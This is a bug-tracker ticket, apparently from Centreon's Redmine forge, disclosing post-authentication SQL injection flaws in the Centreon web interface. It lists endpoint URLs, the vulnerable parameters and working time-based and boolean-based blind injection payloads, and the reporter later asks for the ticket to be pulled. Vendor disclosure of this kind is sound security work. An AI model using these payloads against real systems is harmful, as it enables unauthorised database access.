SQL Injections

[centreon]

---

Author Name: Louis Ferret (Louis Ferret)
Original Redmine Issue: 6452, https://forge.centreon.com/issues/6452
Original Date: 2015-06-30

---

Here are some pages which allow SQL injections :

Method: POST
URL: /centreon/include/home/customView/action.php
Parameter: user_id[]
Payload: user_id[]=18 AND (SELECT * FROM (SELECT(SLEEP(5))) YGTW)
Comments:

• Post authentication
• AND/OR time-based blind SQL injection

Method: GET
URL: /centreon/include/monitoring/objectDetails/xml/hostSendCommand.php?cmd=host_passive_checks&host_id=&sid=[Number]&actiontype=0
Parameter: host_id
Payloads:

• host_id=14 RLIKE (SELECT (CASE WHEN (6703=6703) THEN 14 ELSE 0x28 END))
• host_id=14 AND (SELECT * FROM (SELECT (SLEEP(3))) ZaDF)
  Comments:
• Post Authentication
• Boolean-based blind SQL injection
• AND/OR time-base blind SQL injection

Method: GET
URL: /centreon/include/monitoring/status/Hosts/xml/broker/hostXML.php?sid=[Number]&search=erer&num=0&limit=30&sort_type=host_name&order=ASC&p=20102&time=[Number]&criticality=0
Parameter: order
Payloads :

• ASC, (SELECT * FROM (SELECT(SLEEP(20)))a)
• -1629 OR 8329=BENCHMARK(3000000,MD5(0x584f4a6f))
  Comment:
• Post authentication

Method: GET
URL: /centreon/include/views/graphs/GetXmlTree.php?search_host=&search_service=&sid=[Number]&uid=[Number]&id=[ID]
Parameter: sid
Payload: '+(SELECT * FROM(SELECT(SLEEP(20)))a)+'
Comments:

• Post authentication
• AND/OR time-base blind SQL injection

Method: POST
URL: /centreon/main.php?p=3
Parameter: host
Payload: 14 AND (SELECT * FROM (SELECT (SLEEP(10)))a)--
Comments:

• Post authentication
• AND/OR time-based blind SQL injection

Note that I am copying this by hand so I may write a few typos from time to time.

[centreon]

---

Original Redmine Comment
Author Name: Louis Ferret (Louis Ferret)
Original Date: 2015-06-30T17:27:57Z

---

Didn't think it would be published without validation, you should delete this ticket and keep the description.